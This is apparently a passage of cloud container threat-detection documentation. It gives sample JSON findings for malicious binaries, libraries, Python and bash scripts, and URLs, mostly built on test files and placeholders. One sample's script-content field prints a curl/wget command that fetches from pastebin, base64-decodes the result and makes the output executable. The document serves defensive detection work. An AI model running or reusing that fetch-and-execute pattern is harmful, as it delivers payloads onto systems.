      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "added_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911603",
            "nanos": 535268047
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:40:03.535268047Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Execution: Built in Malicious Binary Executed

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Built in Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:57.405Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:57.250Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "NATIVE_API"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/eicar_testing_file\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/eicar_testing_file\"",
          "\"built-in-malicious-binary-818358caa95b6d42\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-built-in-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "built_in_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 603253608
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1106/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.603253608Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Execution: Malicious Python executed

{
  "finding": {
    "canonicalName": "projects/PROJECT_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "category": "Execution: Malicious Python executed",
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_IMAGE_URI",
        "imageId": "CONTAINER_IMAGE_ID",
        "createTime": "2024-06-17T18:50:13Z"
      }
    ],
    "createTime": "2024-06-17T18:50:15.454Z",
    "description": "A machine learning model using Natural Language Processing  techniques identified an executed python script as malicious.",
    "eventTime": "2024-06-17T18:50:15.217Z",
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "NAMESPACE",
          "containers": [
            {
              "name": "CONTAINER_NAME",
              "uri": "CONTAINER_IMAGE_URI",
              "imageId": "CONTAINER_IMAGE_ID",
              "createTime": "2024-06-17T18:50:13Z"
            }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE_ID"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "EXECUTION",
      "primaryTechniques": [
        "COMMAND_AND_SCRIPTING_INTERPRETER",
        "PYTHON"
      ],
      "additionalTactics": [
        "COMMAND_AND_CONTROL"
      ],
      "additionalTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "muteUpdateTime": "1970-01-01T00:00:00Z",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/locations/global",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "INTERPRETER",
          "size": "3492656",
          "sha256": "INTERPRETER_SHA_256",
          "hashedSize": "3492656",
          "partiallyHashed": false,
        },
        "script": {
          "path": "FILENAME",
          "size": "4191",
          "sha256": "SHA_256",
          "hashedSize": "4096",
          "partiallyHashed": true,
          "contents": "\"#!/usr/bin/env python\\n\\nimport uuid\\nimport subprocess\\nimport os\\nimport sys\\nsys.exit(0)…",
        },
        "args": [
          "INTERPRETER",
          "FILENAME"
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"HOSTNAME\"",
            "val": "\"CONTAINER_NAME\""
          },
        ],
        "pid": "7",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "severity": "CRITICAL",
    "state": "ACTIVE",
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "displayName": "CLUSTER_ID",
    "type": "google.container.Cluster",
    "cloudProvider": "GOOGLE_CLOUD_PLATFORM",
    "service": "container.googleapis.com",
    "location": "ZONE",
    "gcpMetadata": {
      "project": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "projectDisplayName": "PROJECT_ID",
      "parent": "//cloudresourcemanager.googleapis.com/projects/PROJECT_ID",
      "parentDisplayName": "PROJECT_ID",
      "organization": "organizations/ORGANIZATION_ID"
    },
    "resourcePath": {
      "nodes": [
        {
          "nodeType": "GCP_PROJECT",
          "id": "projects/PROJECT_ID",
          "displayName": "PROJECT_ID"
        },
        {
          "nodeType": "GCP_ORGANIZATION",
          "id": "organizations/ORGANIZATION_ID"
        }
      ]
    },
    "resourcePathString": "organizations/ORGANIZATION_ID/projects/PROJECT_ID"
  },
  "sourceProperties": {
    "Process_Arguments": [
      "INTERPRETER",
      "FILENAME"
    ],
    "VM_Instance_Name": "INSTANCE_ID",
    "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      },
    "description": "A machine learning model using Natural Language Processing techniques identified an executed python script as malicious.",
    "Container_Creation_Timestamp": {
      "seconds": 1718650213,
      "nanos": 0
    },
    "Pod_Name": "CONTAINER_NAME",
    "Container_Image_Uri": "CONTAINER_IMAGE_URI",
    "Container_Image_Id": "CONTAINER_IMAGE_ID",
    "Parent_Pid": 1,
    "Container_Name": "CONTAINER_NAME",
    "Pid": 7,
    "Process_Creation_Timestamp": {
      "seconds": 1718650213,
      "nanos": 762524370
    },
    "Environment_Variables": [
    ],
    "Pod_Namespace": "default"
  }
}

  

Execution: Modified Malicious Binary Executed

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Binary Executed",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:51.893Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:51.525Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/file_to_be_modified\"",
          "size": "68",
          "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
          "hashedSize": "68",
          "partiallyHashed": false
        },
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/file_to_be_modified\"",
          "\"modified-malicious-binary-da2a7b72e6008bc3\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-binary\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_binary_executed"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699905066",
            "nanos": 618571329
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.084524438Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Execution: Modified Malicious Library Loaded

{
  "finding": {
    "access": {},
    "application": {},
    "attackExposure": {},
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
    "category": "Execution: Modified Malicious Library Loaded",
    "cloudDlpDataProfile": {},
    "cloudDlpInspection": {},
    "containers": [
      {
        "name": "CONTAINER_NAME",
        "uri": "CONTAINER_URI",
        "imageId": "CONTAINER_IMAGE_ID"
      }
    ],
    "createTime": "2023-11-13T21:38:55.271Z",
    "database": {},
    "eventTime": "2023-11-13T21:38:55.133Z",
    "exfiltration": {},
    "findingClass": "THREAT",
    "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
    "indicator": {},
    "kernelRootkit": {},
    "kubernetes": {
      "pods": [
        {
          "name": "CONTAINER_NAME",
          "ns": "default",
          "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
          ]
        }
      ],
      "nodes": [
        {
          "name": "//compute.googleapis.com/projects/PROJECT_ID/zones/ZONE/instances/INSTANCE"
        }
      ]
    },
    "mitreAttack": {
      "primaryTactic": "COMMAND_AND_CONTROL",
      "primaryTechniques": [
        "INGRESS_TOOL_TRANSFER"
      ]
    },
    "mute": "UNDEFINED",
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "parentDisplayName": "Container Threat Detection",
    "processes": [
      {
        "binary": {
          "path": "\"/malicious_files/drop_mal_lib\"",
          "size": "5005064",
          "sha256": "fe2e70de9f77047d3bf5debe3135811300c9c69b937b7fd3e2ca8451a942d5fb",
          "hashedSize": "5005064",
          "partiallyHashed": false
        },
        "libraries": [
          {
            "path": "\"/malicious_files/file_to_be_modified\"",
            "size": "68",
            "sha256": "275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f",
            "hashedSize": "68",
            "partiallyHashed": false
          }
        ],
        "script": {
          "size": "0",
          "hashedSize": "0",
          "partiallyHashed": false
        },
        "args": [
          "\"/malicious_files/drop_mal_lib\"",
          "\"/malicious_files/file_to_be_modified\"",
          "\"/tmp/modified-malicious-library-430bbedd7049b0d1\""
        ],
        "argumentsTruncated": false,
        "envVariables": [
          {
            "name": "\"KUBERNETES_SERVICE_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"HOSTNAME\"",
            "val": "\"ktd-test-modified-malicious-library\""
          },
          {
            "name": "\"HOME\"",
            "val": "\"/root\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PATH\"",
            "val": "\"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
            "val": "\"tcp\""
          },
          {
            "name": "\"DEBIAN_FRONTEND\"",
            "val": "\"noninteractive\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
            "val": "\"443\""
          },
          {
            "name": "\"KUBERNETES_PORT_443_TCP\"",
            "val": "\"tcp://10.77.124.129:443\""
          },
          {
            "name": "\"KUBERNETES_SERVICE_HOST\"",
            "val": "\"10.77.124.129\""
          },
          {
            "name": "\"PWD\"",
            "val": "\"/malicious_files\""
          }
        ],
        "pid": "8",
        "parentPid": "1"
      }
    ],
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "securityPosture": {},
    "severity": "CRITICAL",
    "state": "ACTIVE",
    "vulnerability": {},
    "externalSystems": {}
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
    "display_name": "CLUSTER_ID",
    "project_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "project_display_name": "PROJECT_ID",
    "parent_name": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parent_display_name": "PROJECT_ID",
    "type": "google.container.Cluster",
    "folders": []
  },
  "sourceProperties": {
    "sourceId": {
      "projectNumber": "PROJECT_NUMBER",
      "customerOrganizationNumber": "ORGANIZATION_NUMBER"
    },
    "detectionCategory": {
      "ruleName": "modified_malicious_library_loaded"
    },
    "detectionPriority": "CRITICAL",
    "affectedResources": [
      {
        "gcpResourceName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER"
      }
    ],
    "evidence": [
      {
        "sourceLogId": {
          "projectId": "PROJECT_ID",
          "resourceContainer": "projects/PROJECT_NUMBER",
          "timestamp": {
            "seconds": "1699911519",
            "nanos": 124151422
          }
        }
      }
    ],
    "properties": {},
    "findingId": "FINDING_ID",
    "contextUris": {
      "mitreUri": {
        "displayName": "MITRE Link",
        "url": "https://attack.mitre.org/techniques/T1105/"
      },
      "virustotalIndicatorQueryUri": [
        {
          "displayName": "VirusTotal IP Link",
          "url": "https://www.virustotal.com/gui/file/275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f/detection"
        }
      ],
      "cloudLoggingQueryUri": [
        {
          "displayName": "Cloud Logging Query Link",
          "url": "https://console.cloud.google.com/logs/query;query=timestamp%3D%222023-11-13T21:38:39.124151422Z%22%0AinsertId%3D%22%22?project=PROJECT_NUMBER"
        }
      ],
      "relatedFindingUri": {}
    }
  }
}
  

Malicious Script Executed

{
  "finding": {
    "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
    "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
    "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "state": "ACTIVE",
    "category": "Malicious Script Executed",
    "sourceProperties": {
      "VM_Instance_Name": "INSTANCE_ID",
      "Script_Filename": "FILENAME",
      "Script_SHA256": "SHA_256",
      "Container_Image_Id": "CONTAINER_IMAGE_ID",
      "Container_Name": "CONTAINER_NAME",
      "Parent_Pid": 1.0,
      "Container_Image_Uri": "CONTAINER_IMAGE_URI",
      "Process_Creation_Timestamp": {
        "seconds": 1.617989997E9,
        "nanos": 1.17396995E8
      },
      "Pid": 53.0,
      "Pod_Namespace": "default",
      "Process_Binary_Fullpath": "INTERPRETER",
      "Process_Arguments": ["INTERPRETER", "FILENAME"],
      "Pod_Name": "POD_NAME",
      "description": "A machine learning model using Natural Language Processing techniques identified an executed bash script as malicious.",
      "Script_Content": "(curl -fsSL https://pastebin.com||wget -q -O - https://pastebin.com)| tac | base64 -di | exit 0 | > x ; chmod 777 x ;",
      "Environment_Variables": ["KUBERNETES_PORT\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT\u003d443", "HOSTNAME\u003dreconnect-
      test-4af235e12be6f9d9", "HOME\u003d/root",
      "KUBERNETES_PORT_443_TCP_ADDR\u003dIP_ADDRESS",
      "PATH\u003d/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "KUBERNETES_PORT_443_TCP_PORT\u003d443",
      "KUBERNETES_PORT_443_TCP_PROTO\u003dtcp",
      "DEBIAN_FRONTEND\u003dnoninteractive",
      "KUBERNETES_PORT_443_TCP\u003dtcp://IP_ADDRESS:PORT",
      "KUBERNETES_SERVICE_PORT_HTTPS\u003d443",
      "KUBERNETES_SERVICE_HOST\u003dIP_ADDRESS", "PWD\u003d/"],
      "Container_Creation_Timestamp": {
        "seconds": 1.617989918E9,
        "nanos": 0.0
      }
    },
    "securityMarks": {
      "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID/securityMarks"
    },
    "eventTime": "2021-04-09T17:39:57.527Z",
    "createTime": "2021-04-09T17:39:57.625Z",
    "propertyDataTypes": {
      "Container_Image_Id": {
        "primitiveDataType": "STRING"
      },
      "Pod_Namespace": {
        "primitiveDataType": "STRING"
      },
      "Container_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Environment_Variables": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "description": {
        "primitiveDataType": "STRING"
      },
      "Pid": {
        "primitiveDataType": "NUMBER"
      },
      "Process_Arguments": {
        "listValues": {
          "propertyDataTypes": [{
            "primitiveDataType": "STRING"
          }]
        }
      },
      "Container_Image_Uri": {
        "primitiveDataType": "STRING"
      },
      "Pod_Name": {
        "primitiveDataType": "STRING"
      },
      "Process_Creation_Timestamp": {
        "dataType": "TIMESTAMP",
        "structValue": {
          "fields": {
            "seconds": {
              "primitiveDataType": "NUMBER"
            },
            "nanos": {
              "primitiveDataType": "NUMBER"
            }
          }
        }
      },
      "Parent_Pid": {
        "primitiveDataType": "NUMBER"
      },
      "VM_Instance_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_Content": {
        "primitiveDataType": "STRING"
      },
      "Script_Filename": {
        "primitiveDataType": "STRING"
      },
      "Container_Name": {
        "primitiveDataType": "STRING"
      },
      "Script_SHA256": {
        "primitiveDataType": "STRING"
      },
      "Process_Binary_Fullpath": {
        "primitiveDataType": "STRING"
      }
    },
    "severity": "CRITICAL",
    "workflowState": "NEW",
    "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID"
  },
  "resource": {
    "name": "//container.googleapis.com/projects/PROJECT_ID/zones/ZONE/clusters/CLUSTER_ID",
    "projectName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "projectDisplayName": "PROJECT_ID",
    "parentName": "//cloudresourcemanager.googleapis.com/projects/PROJECT_NUMBER",
    "parentDisplayName": "PROJECT_ID",
    "type": "google.container.Cluster"
  }
}
  

Malicious URL Observed

    {
      "findings": {
        "access": {},
        "canonicalName": "projects/PROJECT_NUMBER/sources/SOURCE_ID/findings/FINDING_ID",
        "category": "Malicious URL Observed",
        "containers": [
          {
            "name": "CONTAINER_NAME",
            "uri": "CONTAINER_URI",
            "imageId": "CONTAINER_IMAGE_ID"
          }
        ],
        "createTime": "2022-09-14T21:35:46.209Z",
        "database": {},
        "description": "A malicious URL is observed in the container workload.",
        "eventTime": "2022-09-14T21:35:45.992Z",
        "exfiltration": {},
        "findingClass": "THREAT",
        "findingProviderId": "organizations/ORGANIZATION_ID/firstPartyFindingProviders/ktd",
        "indicator": {
          "uris": [
            "testsafebrowsing.appspot.com/s/malware.html"
          ]
        },
        "kubernetes": {
          "pods": [
            {
              "ns": "default",
              "name": "CONTAINER_NAME",
              "containers": [
                {
                  "name": "CONTAINER_NAME",
                  "uri": "CONTAINER_URI",
                  "imageId": CONTAINER_IMAGE_ID"
                }
              ]
            }
          ]
        },
        "mitreAttack": {
          "primaryTactic": "COMMAND_AND_CONTROL",
          "primaryTechniques": [
            "INGRESS_TOOL_TRANSFER"
          ]
        },
        "mute": "UNDEFINED",
        "name": "organizations/ORGANIZATION_ID/sources/SOURCE_ID/findings/FINDING_ID",
        "parent": "organizations/ORGANIZATION_ID/sources/SOURCE_ID",
        "parentDisplayName": "Container Threat Detection",
        "processes": [
          {
            "binary": {
              "path": "\"/bin/echo\""
            },
            "script": {},
            "args": [
              "\"/bin/echo\"",
              "\"https://testsafebrowsing.appspot.com/s/malware.html\""
            ],
            "envVariables": [
              {
                "name": "\"PATH\"",
                "val": "\"/opt/python3.7/bin:/opt/python3.6/bin:/opt/python3.5/bin:/opt/python3.4/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\""
              },
              {
                "name": "\"HOSTNAME\"",
                "val": "\"CONTAINER_NAME\""
              },
              {
                "name": "\"DEBIAN_FRONTEND\"",
                "val": "\"noninteractive\""
              },
              {
                "name": "\"LANG\"",
                "val": "\"C.UTF-8\""
              },
              {
                "name": "\"PYTHONUNBUFFERED\"",
                "val": "\"1\""
              },
              {
                "name": "\"PORT\"",
                "val": "\"8080\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_ADDR\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_HOST\"",
                "val": "\"IP_ADDRESS\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_SERVICE_PORT_HTTPS\"",
                "val": "\"443\""
              },
              {
                "name": "\"KUBERNETES_PORT\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP\"",
                "val": "\"tcp://IP_ADDRESS:443\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PROTO\"",
                "val": "\"tcp\""
              },
              {
                "name": "\"KUBERNETES_PORT_443_TCP_PORT\"",
                "val": "\"443\""
              },
              {
                "name": "\"HOME\"",
                "val": "\"/root\""
              }
            ],
            "pid": "1"
          }
        ],
        "resourceName": "//container.googleapis.com/projects/PROJECT_ID/zones/CLUSTER_ZONE/clusters/CLUSTER_ID",
